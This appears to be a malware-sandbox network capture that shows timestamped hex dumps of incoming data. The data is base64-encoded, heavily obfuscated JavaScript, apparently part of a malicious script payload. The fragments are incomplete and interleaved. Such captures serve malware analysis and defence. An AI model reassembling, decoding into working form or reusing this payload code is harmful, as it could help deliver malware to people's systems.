                                                                  2023-04-26 07:00:14 UTC3812INData Raw: 38 77 65 47 4d 34 20 4e 47 49 30 59 69 78 66 4d 48 68 68 4e 44 56 68 4f 44 67 70 4f 33 30 73 4a 32 64 42 52 46 4a 36 4a 7a 70 6d 64 57 35 6a 64 47 6c 76 62 69 68 66 4d 48 67 31 4d 54 45 32 59 54 4d 73 58 7a 42 34 4d 6a 5a 6b 59 6d 51 79 4b 58 74 32 20 59 58 49 67 58 7a 42 34 4d 57 5a 6a 4e 44 4e 6a 50 56 38 77 65 44 45 32 4f 47 45 37 63 6d 56 30 64 58 4a 75 49 46 38 77 65 44 56 69 4f 54 49 35 4e 56 74 66 4d 48 67 78 5a 6d 4d 30 4d 32 4d 6f 4d 48 67 79 4e 54 52 6a 4b 56 30 6f 20 58 7a 42 34 4e 54 45 78 4e 6d 45 7a 4c 46 38 77 65 44 49 32 5a 47 4a 6b 4d 69 6b 37 66 53 77 6e 62 47 78 42 56 31 67 6e 4f 6d 5a 31 62 6d 4e 30 61 57 39 75 4b 46 38 77 65 44 49 35 4e 57 59 34 59 69 78 66 4d 48 67 78 4f 47 52 6c 20 4d 7a 63 70 65 33 5a 68 63 69 42 66 4d 48 67 79 4d
                                                                  Data Ascii: 8weGM4 NGI0YixfMHhhNDVhODgpO30sJ2dBRFJ6JzpmdW5jdGlvbihfMHg1MTE2YTMsXzB4MjZkYmQyKXt2 YXIgXzB4MWZjNDNjPV8weDE2OGE7cmV0dXJuIF8weDViOTI5NVtfMHgxZmM0M2MoMHgyNTRjKV0o XzB4NTExNmEzLF8weDI2ZGJkMik7fSwnbGxBV1gnOmZ1bmN0aW9uKF8weDI5NWY4YixfMHgxOGRl Mzcpe3ZhciBfMHgyM
                                                                  2023-04-26 07:00:14 UTC3828INData Raw: 6d 4e 30 61 57 39 75 4b 46 38 77 65 44 4a 6a 4e 47 5a 6a 59 69 78 66 20 4d 48 67 79 59 6a 6c 6c 4e 47 51 70 65 33 5a 68 63 69 42 66 4d 48 67 33 4f 54 45 32 59 6d 45 39 58 7a 42 34 4d 54 59 34 59 54 74 79 5a 58 52 31 63 6d 34 67 58 7a 42 34 4e 57 49 35 4d 6a 6b 31 57 31 38 77 65 44 63 35 4d 54 5a 69 20 59 53 67 77 65 44 45 7a 4e 6a 51 70 58 53 68 66 4d 48 67 79 59 7a 52 6d 59 32 49 73 58 7a 42 34 4d 6d 49 35 5a 54 52 6b 4b 54 74 39 4c 43 64 5a 55 58 4e 4c 65 69 63 36 5a 6e 56 75 59 33 52 70 62 32 34 6f 58 7a 42 34 4d 6a 64 68 20 5a 6d 51 34 4c 46 38 77 65 44 59 79 59 6d 4a 6d 4e 53 6c 37 64 6d 46 79 49 46 38 77 65 44 49 33 4e 57 45 7a 4f 54 31 66 4d 48 67 78 4e 6a 68 68 4f 33 4a 6c 64 48 56 79 62 69 42 66 4d 48 67 31 59 6a 6b 79 4f 54 56 62 58 7a 42 34 20
                                                                  Data Ascii: mN0aW9uKF8weDJjNGZjYixf MHgyYjllNGQpe3ZhciBfMHg3OTE2YmE9XzB4MTY4YTtyZXR1cm4gXzB4NWI5Mjk1W18weDc5MTZi YSgweDEzNjQpXShfMHgyYzRmY2IsXzB4MmI5ZTRkKTt9LCdZUXNLeic6ZnVuY3Rpb24oXzB4Mjdh ZmQ4LF8weDYyYmJmNSl7dmFyIF8weDI3NWEzOT1fMHgxNjhhO3JldHVybiBfMHg1YjkyOTVbXzB4
                                                                  2023-04-26 07:00:14 UTC3844INData Raw: 4e 57 55 39 58 7a 42 34 4d 54 59 34 59 54 74 79 5a 58 52 31 63 6d 34 67 58 7a 42 34 4e 44 64 6d 5a 54 68 6d 57 31 38 77 20 65 44 56 69 4f 54 49 35 4e 56 74 66 4d 48 67 30 4f 57 4e 6b 4e 57 55 6f 4d 48 67 79 5a 57 5a 6c 4b 56 30 6f 58 7a 42 34 4d 54 4e 6c 4e 79 77 77 65 44 45 77 4d 57 51 72 4c 54 42 34 4d 57 55 72 4c 54 42 34 4f 57 5a 69 4b 56 30 6f 20 58 7a 42 34 4e 44 56 68 5a 44 55 79 4c 46 38 77 65 44 52 6a 4e 47 5a 6c 4d 43 6b 37 66 53 77 6e 5a 6d 64 47 59 32 38 6e 4f 6d 5a 31 62 6d 4e 30 61 57 39 75 4b 46 38 77 65 44 49 79 4f 57 59 31 59 69 78 66 4d 48 67 7a 4d 7a 4e 6b 20 5a 6a 49 70 65 33 5a 68 63 69 42 66 4d 48 67 7a 5a 6d 46 69 4d 54 59 39 58 7a 42 34 4d 54 59 34 59 54 74 79 5a 58 52 31 63 6d 34 67 58 7a 42 34 4e 44 64 6d 5a 54 68 6d 57 31 38 77
                                                                  Data Ascii: NWU9XzB4MTY4YTtyZXR1cm4gXzB4NDdmZThmW18w eDViOTI5NVtfMHg0OWNkNWUoMHgyZWZlKV0oXzB4MTNlNywweDEwMWQrLTB4MWUrLTB4OWZiKV0o XzB4NDVhZDUyLF8weDRjNGZlMCk7fSwnZmdGY28nOmZ1bmN0aW9uKF8weDIyOWY1YixfMHgzMzNk ZjIpe3ZhciBfMHgzZmFiMTY9XzB4MTY4YTtyZXR1cm4gXzB4NDdmZThmW18w
                                                                  2023-04-26 07:00:14 UTC3860INData Raw: 69 4f 54 49 35 4e 56 74 66 4d 48 68 6a 4f 54 51 31 4e 6a 45 6f 4d 48 67 32 4f 47 4d 70 58 53 68 66 4d 48 67 78 4d 32 55 33 4c 44 42 34 5a 54 51 78 4b 7a 42 34 4d 6a 41 32 20 4f 53 73 74 4d 48 67 79 4e 32 56 6d 4b 56 30 6f 58 7a 42 34 4e 57 59 79 4d 47 51 34 4c 46 38 77 65 44 5a 6a 4e 32 55 30 4e 43 6b 37 66 53 77 6e 55 32 64 34 64 57 6b 6e 4f 6d 5a 31 62 6d 4e 30 61 57 39 75 4b 46 38 77 65 44 45 34 20 4d 54 6b 79 59 53 78 66 4d 48 67 34 4d 47 5a 6d 4e 54 59 70 65 33 5a 68 63 69 42 66 4d 48 68 6d 5a 44 4d 79 5a 44 4d 39 58 7a 42 34 4d 54 59 34 59 54 74 79 5a 58 52 31 63 6d 34 67 58 7a 42 34 4e 44 64 6d 5a 54 68 6d 57 31 38 77 20 65 44 56 69 4f 54 49 35 4e 56 74 66 4d 48 68 6d 5a 44 4d 79 5a 44 4d 6f 4d 48 68 69 59 7a 6b 70 58 53 68 66 4d 48 67 78 4d 32 55
                                                                  Data Ascii: iOTI5NVtfMHhjOTQ1NjEoMHg2OGMpXShfMHgxM2U3LDB4ZTQxKzB4MjA2 OSstMHgyN2VmKV0oXzB4NWYyMGQ4LF8weDZjN2U0NCk7fSwnU2d4dWknOmZ1bmN0aW9uKF8weDE4 MTkyYSxfMHg4MGZmNTYpe3ZhciBfMHhmZDMyZDM9XzB4MTY4YTtyZXR1cm4gXzB4NDdmZThmW18w eDViOTI5NVtfMHhmZDMyZDMoMHhiYzkpXShfMHgxM2U
                                                                  2023-04-26 07:00:14 UTC3876INData Raw: 56 62 58 7a 42 34 4d 7a 41 35 4e 7a 41 33 4b 44 42 34 4d 6a 55 79 59 79 6c 64 4b 46 38 77 65 44 45 7a 5a 6a 55 35 59 79 77 77 65 44 49 78 4f 44 63 72 4d 48 67 31 5a 54 45 72 4d 48 67 7a 4b 69 30 77 65 47 45 31 4e 53 6c 64 20 4b 46 38 77 65 44 45 31 5a 6a 63 35 5a 69 77 74 4d 48 68 6a 4e 44 6b 72 4d 48 67 78 4e 79 6f 74 4d 48 67 7a 59 53 73 77 65 44 45 7a 59 6a 59 70 58 53 68 66 4d 48 67 31 59 6d 51 7a 5a 6a 45 73 4c 54 42 34 4d 57 4d 78 5a 53 73 74 20 4d 48 67 32 4d 6a 63 72 4d 48 67 78 4b 6a 42 34 4d 6a 55 34 5a 43 6b 73 4a 31 4e 50 55 47 39 34 4a 7a 70 66 4d 48 67 30 4d 32 45 77 4f 54 52 62 58 7a 42 34 4e 44 64 6d 5a 54 68 6d 57 31 38 77 65 44 56 69 4f 54 49 35 4e 56 74 66 20 4d 48 67 7a 4d 44 6b 33 4d 44 63 6f 4d 48 67 79 5a 57 49 78 4b 56 30 6f 58 7a
                                                                  Data Ascii: VbXzB4MzA5NzA3KDB4MjUyYyldKF8weDEzZjU5YywweDIxODcrMHg1ZTErMHgzKi0weGE1NSld KF8weDE1Zjc5ZiwtMHhjNDkrMHgxNyotMHgzYSsweDEzYjYpXShfMHg1YmQzZjEsLTB4MWMxZSst MHg2MjcrMHgxKjB4MjU4ZCksJ1NPUG94JzpfMHg0M2EwOTRbXzB4NDdmZThmW18weDViOTI5NVtf MHgzMDk3MDcoMHgyZWIxKV0oXz
                                                                  2023-04-26 07:00:14 UTC3892INData Raw: 45 31 5a 6a 63 35 5a 69 77 74 4d 48 67 78 20 5a 6a 41 30 4b 7a 42 34 59 57 55 34 4b 7a 42 34 4d 54 68 6d 4e 69 6c 64 4b 46 38 77 65 44 51 7a 59 54 41 35 4e 46 74 66 4d 48 67 30 4e 32 5a 6c 4f 47 5a 62 58 7a 42 34 4e 57 49 35 4d 6a 6b 31 57 31 38 77 65 44 4d 77 4f 54 63 77 20 4e 79 67 77 65 44 49 30 4e 32 45 70 58 53 68 66 4d 48 67 78 4d 32 59 31 4f 57 4d 73 4c 54 42 34 4d 6a 46 6c 4b 69 30 77 65 47 45 72 4c 54 42 34 4d 54 42 6d 5a 43 6f 77 65 44 45 72 4c 54 42 34 4e 69 6f 74 4d 48 67 30 4e 43 6c 64 20 4b 46 38 77 65 44 45 31 5a 6a 63 35 5a 69 77 74 4d 48 67 7a 59 53 6f 77 65 44 45 33 4b 79 30 77 65 44 49 79 4d 53 6f 77 65 47 51 72 4d 48 67 79 4e 6d 4d 33 4b 56 30 6f 58 7a 42 34 4e 57 4a 6b 4d 32 59 78 4c 43 30 77 65 44 49 7a 20 59 69 6f 77 65 44 45 72 4d
                                                                  Data Ascii: E1Zjc5ZiwtMHgx ZjA0KzB4YWU4KzB4MThmNildKF8weDQzYTA5NFtfMHg0N2ZlOGZbXzB4NWI5Mjk1W18weDMwOTcw NygweDI0N2EpXShfMHgxM2Y1OWMsLTB4MjFlKi0weGErLTB4MTBmZCoweDErLTB4NiotMHg0NCld KF8weDE1Zjc5ZiwtMHgzYSoweDE3Ky0weDIyMSoweGQrMHgyNmM3KV0oXzB4NWJkM2YxLC0weDIz YioweDErM
                                                                  2023-04-26 07:00:14 UTC3908INData Raw: 7a 42 34 4d 53 6f 77 65 44 49 79 4b 7a 42 34 4e 43 6f 74 4d 48 68 6d 4e 53 6c 64 4b 46 38 77 20 65 44 45 31 5a 6a 63 35 5a 69 77 77 65 44 6b 71 4c 54 42 34 4d 6a 59 31 4b 79 30 77 65 44 4d 34 4b 6a 42 34 4d 7a 45 72 4d 48 67 79 4d 57 52 69 4b 56 30 6f 58 7a 42 34 4e 57 4a 6b 4d 32 59 78 4c 43 30 77 65 44 45 78 59 6d 55 72 20 4d 48 67 78 4e 32 49 78 4b 79 30 77 65 44 51 79 4e 43 6c 64 4c 46 38 77 65 44 4d 33 59 32 49 77 59 56 74 66 4d 48 67 30 4d 32 45 77 4f 54 52 62 58 7a 42 34 4e 44 64 6d 5a 54 68 6d 57 31 38 77 65 44 56 69 4f 54 49 35 4e 56 74 66 20 4d 48 67 7a 4d 44 6b 33 4d 44 63 6f 4d 48 67 78 5a 44 68 6a 4b 56 30 6f 58 7a 42 34 4d 54 4e 6d 4e 54 6c 6a 4c 43 30 77 65 47 4d 78 4e 53 73 77 65 47 49 30 4d 53 73 77 65 44 45 77 59 6a 41 70 58 53 68 66 4d
                                                                  Data Ascii: zB4MSoweDIyKzB4NCotMHhmNSldKF8w eDE1Zjc5ZiwweDkqLTB4MjY1Ky0weDM4KjB4MzErMHgyMWRiKV0oXzB4NWJkM2YxLC0weDExYmUr MHgxN2IxKy0weDQyNCldLF8weDM3Y2IwYVtfMHg0M2EwOTRbXzB4NDdmZThmW18weDViOTI5NVtf MHgzMDk3MDcoMHgxZDhjKV0oXzB4MTNmNTljLC0weGMxNSsweGI0MSsweDEwYjApXShfM
                                                                  2023-04-26 07:00:14 UTC3924INData Raw: 5a 69 77 74 4d 48 67 7a 4b 6a 42 34 4e 54 6b 31 4b 7a 42 34 4d 79 6f 77 65 47 49 77 4e 53 73 74 4d 48 68 6b 4f 47 4d 70 58 53 68 66 4d 48 67 31 20 59 6d 51 7a 5a 6a 45 73 4d 48 67 78 4b 69 30 77 65 44 46 6c 4e 79 73 77 65 44 46 6d 5a 43 6f 74 4d 48 68 6d 4b 7a 42 34 4d 6a 4a 6d 59 53 6c 64 4c 46 38 77 65 44 4d 33 59 32 49 77 59 56 74 66 4d 48 67 30 4d 32 45 77 4f 54 52 62 20 58 7a 42 34 4e 44 64 6d 5a 54 68 6d 57 31 38 77 65 44 56 69 4f 54 49 35 4e 56 74 66 4d 48 67 7a 4d 44 6b 33 4d 44 63 6f 4d 48 67 79 5a 44 51 35 4b 56 30 6f 58 7a 42 34 4d 54 4e 6d 4e 54 6c 6a 4c 43 30 77 65 44 4d 71 4d 48 67 33 20 4e 7a 6b 72 4c 54 42 34 4d 54 41 71 4d 48 67 78 59 54 49 72 4d 48 67 30 4d 57 49 77 4b 56 30 6f 58 7a 42 34 4d 54 56 6d 4e 7a 6c 6d 4c 43 30 77 65 47 4a 6c
                                                                  Data Ascii: ZiwtMHgzKjB4NTk1KzB4MyoweGIwNSstMHhkOGMpXShfMHg1 YmQzZjEsMHgxKi0weDFlNysweDFmZCotMHhmKzB4MjJmYSldLF8weDM3Y2IwYVtfMHg0M2EwOTRb XzB4NDdmZThmW18weDViOTI5NVtfMHgzMDk3MDcoMHgyZDQ5KV0oXzB4MTNmNTljLC0weDMqMHg3 NzkrLTB4MTAqMHgxYTIrMHg0MWIwKV0oXzB4MTVmNzlmLC0weGJl
                                                                  2023-04-26 07:00:14 UTC3940INData Raw: 34 4d 54 59 34 59 54 74 79 5a 58 52 31 63 6d 34 67 58 7a 42 34 4d 57 46 6a 4d 54 67 30 57 31 38 77 65 44 55 7a 5a 6a 5a 6d 4d 53 67 77 65 47 59 79 5a 69 6c 64 4b 46 38 77 65 44 52 69 5a 54 4d 31 20 4e 69 78 66 4d 48 67 79 4d 57 59 78 59 6d 59 70 4f 33 30 73 4a 32 56 30 53 30 35 45 4a 7a 70 6d 64 57 35 6a 64 47 6c 76 62 69 68 66 4d 48 67 30 4d 44 63 32 4d 7a 67 73 58 7a 42 34 4f 44 51 32 5a 6a 41 34 4b 58 74 32 59 58 49 67 20 58 7a 42 34 4e 54 63 35 4d 6a 55 79 50 56 38 77 65 44 45 32 4f 47 45 37 63 6d 56 30 64 58 4a 75 49 46 38 77 65 44 46 68 59 7a 45 34 4e 46 74 66 4d 48 67 31 4e 7a 6b 79 4e 54 49 6f 4d 48 67 78 4d 6a 63 78 4b 56 30 6f 58 7a 42 34 20 4e 44 41 33 4e 6a 4d 34 4c 46 38 77 65 44 67 30 4e 6d 59 77 4f 43 6b 37 66 53 77 6e 55 6e 64 44 59 30 4d
                                                                  Data Ascii: 4MTY4YTtyZXR1cm4gXzB4MWFjMTg0W18weDUzZjZmMSgweGYyZildKF8weDRiZTM1 NixfMHgyMWYxYmYpO30sJ2V0S05EJzpmdW5jdGlvbihfMHg0MDc2MzgsXzB4ODQ2ZjA4KXt2YXIg XzB4NTc5MjUyPV8weDE2OGE7cmV0dXJuIF8weDFhYzE4NFtfMHg1NzkyNTIoMHgxMjcxKV0oXzB4 NDA3NjM4LF8weDg0NmYwOCk7fSwnUndDY0M
                                                                  2023-04-26 07:00:14 UTC3956INData Raw: 77 65 44 4d 79 20 4d 6a 4a 6c 5a 53 67 77 65 47 45 79 4d 79 6c 64 4b 46 38 77 65 44 45 7a 5a 54 63 73 4d 48 67 7a 5a 53 73 74 4d 48 67 78 59 6d 55 77 4b 7a 42 34 4d 6a 68 6b 4f 43 6c 64 4b 46 38 77 65 44 56 6b 4d 7a 41 73 4c 54 42 34 4d 54 45 79 20 5a 69 73 77 65 47 52 6d 4b 69 30 77 65 44 6b 72 4d 48 67 78 5a 47 56 6c 4b 56 30 6f 58 7a 42 34 4e 44 4d 78 5a 6a 68 6a 4c 46 38 77 65 44 49 79 4e 44 4e 68 5a 69 6b 37 66 58 30 73 58 7a 42 34 4d 57 59 31 4e 57 46 69 50 56 38 77 20 65 44 45 78 4f 44 63 77 59 79 78 66 4d 48 67 33 4d 6a 59 34 4d 32 59 39 65 79 64 44 5a 47 4a 70 59 53 63 36 5a 6e 56 75 59 33 52 70 62 32 34 6f 58 7a 42 34 4e 7a 67 31 5a 44 6b 79 4c 46 38 77 65 44 55 34 4e 47 55 31 4d 69 6c 37 20 64 6d 46 79 49 46 38 77 65 44 4e 6b 4f 47 56 6c 59 6a
                                                                  Data Ascii: weDMy MjJlZSgweGEyMyldKF8weDEzZTcsMHgzZSstMHgxYmUwKzB4MjhkOCldKF8weDVkMzAsLTB4MTEy ZisweGRmKi0weDkrMHgxZGVlKV0oXzB4NDMxZjhjLF8weDIyNDNhZik7fX0sXzB4MWY1NWFiPV8w eDExODcwYyxfMHg3MjY4M2Y9eydDZGJpYSc6ZnVuY3Rpb24oXzB4Nzg1ZDkyLF8weDU4NGU1Mil7 dmFyIF8weDNkOGVlYj
                                                                  2023-04-26 07:00:14 UTC3972INData Raw: 35 59 63 6e 59 6e 4c 43 64 52 55 48 56 77 52 43 63 73 4a 30 6c 70 20 51 6c 64 4f 4a 79 77 6e 5a 32 4a 48 54 30 34 6e 4c 43 64 6d 61 46 42 54 64 79 63 73 4a 32 35 55 56 47 39 4c 4a 79 77 6e 57 6e 4a 69 61 6b 59 6e 4c 43 64 43 65 47 35 42 54 79 63 73 4a 32 78 6c 57 58 68 30 4a 79 77 6e 56 46 56 43 20 54 45 45 6e 4c 43 64 77 57 57 64 55 62 79 63 73 4a 32 52 34 62 57 68 48 4a 79 77 6e 55 58 56 4f 5a 48 59 6e 4c 43 64 6b 56 6d 56 5a 52 79 63 73 4a 31 56 4f 61 47 6c 47 4a 79 77 6e 5a 6b 4e 79 51 57 67 6e 4c 43 64 6b 62 46 42 7a 20 61 53 63 73 4a 32 35 34 53 58 4e 4a 4a 79 77 6e 65 56 4a 6f 63 56 67 6e 4c 43 64 32 59 33 68 4f 54 69 63 73 4a 30 6c 43 57 57 6c 42 4a 79 77 6e 63 55 64 71 62 58 6b 6e 4c 43 64 51 63 46 46 53 56 79 63 73 4a 32 46 44 63 32 70 4e 20 4a
                                                                  Data Ascii: 5YcnYnLCdRUHVwRCcsJ0lp QldOJywnZ2JHT04nLCdmaFBTdycsJ25UVG9LJywnWnJiakYnLCdCeG5BTycsJ2xlWXh0JywnVFVC TEEnLCdwWWdUbycsJ2R4bWhHJywnUXVOZHYnLCdkVmVZRycsJ1VOaGlGJywnZkNyQWgnLCdkbFBz aScsJ254SXNJJywneVJocVgnLCd2Y3hOTicsJ0lCWWlBJywncUdqbXknLCdQcFFSVycsJ2FDc2pN J
                                                                  2023-04-26 07:00:14 UTC3988INData Raw: 31 4e 32 63 32 5a 6c 4a 79 77 6e 64 45 39 52 53 33 55 6e 4c 43 64 74 55 45 68 56 64 69 63 73 4a 30 4e 69 51 58 56 77 20 4a 79 77 6e 65 48 70 61 54 47 34 6e 4c 43 64 46 56 45 64 4f 5a 79 63 73 4a 33 4a 50 56 46 64 4f 4a 79 77 6e 51 31 46 56 64 6d 59 6e 4c 43 64 31 55 57 68 31 64 43 63 73 4a 30 68 73 61 46 6c 74 4a 79 77 6e 56 6b 4e 57 5a 55 34 6e 20 4c 43 64 78 56 58 4a 35 52 79 63 73 4a 33 4a 56 57 57 56 31 4a 79 77 6e 64 47 4a 48 57 6b 73 6e 4c 43 64 4e 55 6b 4a 4d 53 69 63 73 4a 31 68 71 57 57 78 50 4a 79 77 6e 55 6d 78 52 52 55 38 6e 4c 43 64 4d 51 6b 56 69 61 43 63 73 20 4a 32 68 45 63 48 56 42 4a 79 77 6e 53 6b 78 70 62 55 6b 6e 4c 43 64 6d 53 33 5a 58 64 43 63 73 4a 33 6c 56 55 45 5a 53 4a 79 77 6e 54 6b 39 34 62 55 49 6e 4c 43 64 59 54 33 46 50 5a
                                                                  Data Ascii: 1N2c2ZlJywndE9RS3UnLCdtUEhVdicsJ0NiQXVw JywneHpaTG4nLCdFVEdOZycsJ3JPVFdOJywnQ1FVdmYnLCd1UWh1dCcsJ0hsaFltJywnVkNWZU4n LCdxVXJ5RycsJ3JVWWV1JywndGJHWksnLCdNUkJMSicsJ1hqWWxPJywnUmxRRU8nLCdMQkViaCcs J2hEcHVBJywnSkxpbUknLCdmS3ZXdCcsJ3lVUEZSJywnTk94bUInLCdYT3FPZ
                                                                  2023-04-26 07:00:14 UTC4004INData Raw: 56 69 63 73 4a 32 5a 58 63 58 46 47 4a 79 77 6e 59 6c 56 35 61 33 63 6e 4c 43 64 6a 54 47 70 54 54 53 63 73 4a 31 64 51 63 55 46 4d 4a 79 77 6e 62 6b 78 4e 51 55 73 6e 20 4c 43 64 42 61 55 68 75 61 79 63 73 4a 32 46 4a 54 58 68 55 4a 79 77 6e 56 31 46 55 5a 48 49 6e 4c 43 64 61 53 45 68 53 61 43 63 73 4a 30 56 79 52 57 4a 6a 4a 79 77 6e 4e 7a 63 34 51 6e 70 59 56 6d 6c 54 4a 79 77 6e 5a 48 70 77 20 64 33 67 6e 4c 43 64 4b 54 46 56 30 61 79 63 73 4a 32 46 4d 54 46 70 55 4a 79 77 6e 65 46 64 57 5a 57 4d 6e 4c 43 64 4a 61 58 42 48 53 43 63 73 4a 31 46 36 5a 30 68 4b 4a 79 77 6e 64 31 5a 73 56 32 77 6e 4c 43 64 6f 57 56 5a 6c 20 56 69 63 73 4a 30 5a 77 54 6c 52 49 4a 79 77 6e 54 55 74 47 57 6c 49 6e 4c 43 64 61 57 6c 46 4d 57 69 63 73 4a 30 31 46 61 31 42 79
                                                                  Data Ascii: VicsJ2ZXcXFGJywnYlV5a3cnLCdjTGpTTScsJ1dQcUFMJywnbkxNQUsn LCdBaUhuaycsJ2FJTXhUJywnV1FUZHInLCdaSEhSaCcsJ0VyRWJjJywnNzc4QnpYVmlTJywnZHpw d3gnLCdKTFV0aycsJ2FMTFpUJywneFdWZWMnLCdJaXBHSCcsJ1F6Z0hKJywnd1ZsV2wnLCdoWVZl VicsJ0ZwTlRIJywnTUtGWlInLCdaWlFMWicsJ01Fa1By
                                                                  2023-04-26 07:00:14 UTC4020INData Raw: 76 4a 79 77 6e 52 6b 4e 31 64 33 51 6e 4c 43 64 56 63 57 4e 4c 65 43 63 73 4a 31 4a 4d 51 32 39 30 4a 79 77 6e 52 45 31 54 56 6b 4d 6e 4c 43 64 43 5a 32 5a 31 55 43 63 73 4a 31 64 4a 61 31 70 33 4a 79 77 6e 53 6d 46 59 20 56 55 77 6e 4c 43 64 78 53 45 31 33 53 69 63 73 4a 33 6c 34 5a 6b 74 43 4a 79 77 6e 54 55 35 59 65 46 59 6e 4c 43 64 51 51 6b 64 72 51 79 63 73 4a 32 5a 4a 53 46 4a 77 4a 79 77 6e 63 45 78 59 54 46 4d 6e 4c 43 64 58 56 57 4e 7a 20 65 53 63 73 4a 32 52 4d 62 58 42 71 4a 79 77 6e 57 48 4e 69 59 6c 55 6e 4c 43 64 5a 54 58 4a 76 52 53 63 73 4a 7a 45 35 4d 54 55 34 4d 6a 68 33 56 46 6b 6e 4c 43 64 72 59 55 78 4c 62 43 63 73 4a 33 70 4f 53 55 56 4e 4a 79 77 6e 20 59 57 68 4e 51 6d 55 6e 4c 43 64 53 54 45 31 6b 53 53 63 73 4a 31 6c 69 57 58 46
                                                                  Data Ascii: vJywnRkN1d3QnLCdVcWNLeCcsJ1JMQ290JywnRE1TVkMnLCdCZ2Z1UCcsJ1dJa1p3JywnSmFY VUwnLCdxSE13SicsJ3l4ZktCJywnTU5YeFYnLCdQQkdrQycsJ2ZJSFJwJywncExYTFMnLCdXVWNz eScsJ2RMbXBqJywnWHNiYlUnLCdZTXJvRScsJzE5MTU4Mjh3VFknLCdrYUxLbCcsJ3pOSUVNJywn YWhNQmUnLCdSTE1kSScsJ1liWXF
                                                                  2023-04-26 07:00:14 UTC4036INData Raw: 4b 5a 6b 4e 48 4a 79 77 6e 62 30 52 75 20 52 6e 6b 6e 4c 43 64 6a 52 6b 70 73 57 69 63 73 4a 30 35 69 62 32 6c 36 4a 79 77 6e 55 33 6c 4f 52 6d 73 6e 4c 43 64 34 51 55 6c 6a 5a 43 63 73 4a 30 5a 78 51 6d 4e 68 4a 79 77 6e 61 31 5a 31 53 45 59 6e 4c 43 64 79 56 6d 70 6e 20 53 53 63 73 4a 33 56 42 62 56 56 36 4a 79 77 6e 53 31 46 46 59 6d 6f 6e 4c 43 64 5a 63 6e 52 54 51 79 63 73 4a 33 52 59 5a 48 5a 45 4a 79 77 6e 61 55 5a 73 55 31 41 6e 4c 43 64 4f 63 47 4e 6d 51 69 63 73 4a 31 68 74 65 48 46 31 20 4a 79 77 6e 61 57 70 75 61 6e 6f 6e 4c 43 64 32 5a 47 4a 47 62 43 63 73 4a 31 68 43 62 31 68 53 4a 79 77 6e 65 6b 4a 76 55 30 6b 6e 4c 43 64 57 62 33 42 51 53 43 63 73 4a 33 70 35 55 55 46 78 4a 79 77 6e 61 6b 4a 75 5a 6b 63 6e 20 4c 43 64 4d 64 46 46 48 51 69
                                                                  Data Ascii: KZkNHJywnb0Ru RnknLCdjRkpsWicsJ05ib2l6JywnU3lORmsnLCd4QUljZCcsJ0ZxQmNhJywna1Z1SEYnLCdyVmpn SScsJ3VBbVV6JywnS1FFYmonLCdZcnRTQycsJ3RYZHZEJywnaUZsU1AnLCdOcGNmQicsJ1hteHF1 JywnaWpuanonLCd2ZGJGbCcsJ1hCb1hSJywnekJvU0knLCdWb3BQSCcsJ3p5UUFxJywnakJuZkcn LCdMdFFHQi
                                                                  2023-04-26 07:00:14 UTC4052INData Raw: 77 6e 64 30 5a 33 55 6c 63 6e 4c 43 64 55 59 57 68 44 59 53 63 73 4a 30 70 73 57 6b 56 33 20 4a 79 77 6e 63 47 56 51 64 6e 41 6e 4c 43 64 33 52 48 68 54 52 69 63 73 4a 32 74 49 59 57 35 54 4a 79 77 6e 5a 45 5a 7a 65 45 30 6e 4c 43 64 47 64 6d 74 78 5a 43 63 73 4a 33 42 5a 5a 47 68 76 4a 79 77 6e 51 6c 56 75 59 58 41 6e 20 4c 43 64 4e 56 45 46 79 61 53 63 73 4a 30 35 36 56 30 4a 4b 4a 79 77 6e 53 46 5a 36 54 6c 45 6e 4c 43 64 58 63 6d 5a 50 63 79 63 73 4a 33 56 71 5a 58 46 5a 4a 79 77 6e 62 46 5a 69 63 32 49 6e 4c 43 64 4a 54 6b 70 52 55 53 63 73 20 4a 31 4a 73 55 6d 4a 50 4a 79 77 6e 52 47 31 71 52 48 51 6e 4c 43 64 4a 5a 31 68 43 63 69 63 73 4a 32 64 4a 51 30 64 32 4a 79 77 6e 63 55 78 54 64 55 63 6e 4c 43 64 76 51 56 42 36 61 53 63 73 4a 32 70 5a 57 58
                                                                  Data Ascii: wnd0Z3UlcnLCdUYWhDYScsJ0psWkV3 JywncGVQdnAnLCd3RHhTRicsJ2tIYW5TJywnZEZzeE0nLCdGdmtxZCcsJ3BZZGhvJywnQlVuYXAn LCdNVEFyaScsJ056V0JKJywnSFZ6TlEnLCdXcmZPcycsJ3VqZXFZJywnbFZic2InLCdJTkpRUScs J1JsUmJPJywnRG1qRHQnLCdJZ1hCcicsJ2dJQ0d2JywncUxTdUcnLCdvQVB6aScsJ2pZWX
                                                                  2023-04-26 07:00:14 UTC4068INData Raw: 31 56 50 5a 6b 51 6e 4c 43 64 4b 65 58 52 6b 55 69 63 73 4a 31 6c 42 5a 48 56 56 4a 79 77 6e 52 6d 39 73 5a 47 56 79 52 58 68 70 63 79 63 73 20 4a 30 74 6c 61 6d 35 6f 4a 79 77 6e 51 6e 46 56 64 45 4d 6e 4c 43 64 50 64 32 78 52 54 69 63 73 4a 30 56 79 63 6d 78 4d 4a 79 77 6e 5a 57 5a 43 55 55 51 6e 4c 43 64 31 5a 32 31 71 55 79 63 73 4a 30 46 45 61 32 39 47 4a 79 77 6e 20 59 30 78 74 63 6c 49 6e 4c 43 64 59 63 6e 46 79 61 69 63 73 4a 30 70 61 63 6d 35 73 4a 79 77 6e 56 58 6c 4d 64 45 67 6e 4c 43 64 6c 54 47 4a 6d 61 79 63 73 4a 33 6c 35 65 6b 31 49 4a 79 77 6e 61 58 42 4e 51 6b 45 6e 4c 43 64 68 20 64 58 64 4d 53 53 63 73 4a 32 39 30 59 33 42 4c 4a 79 77 6e 56 30 4a 76 53 48 6f 6e 4c 43 64 6d 56 6b 39 4f 52 79 63 73 4a 32 74 30 55 6e 42 78 4a 79 77 6e 5a
                                                                  Data Ascii: 1VPZkQnLCdKeXRkUicsJ1lBZHVVJywnRm9sZGVyRXhpcycs J0tlam5oJywnQnFVdEMnLCdPd2xRTicsJ0VycmxMJywnZWZCUUQnLCd1Z21qUycsJ0FEa29GJywn Y0xtclInLCdYcnFyaicsJ0pacm5sJywnVXlMdEgnLCdlTGJmaycsJ3l5ek1IJywnaXBNQkEnLCdh dXdMSScsJ290Y3BLJywnV0JvSHonLCdmVk9ORycsJ2t0UnBxJywnZ
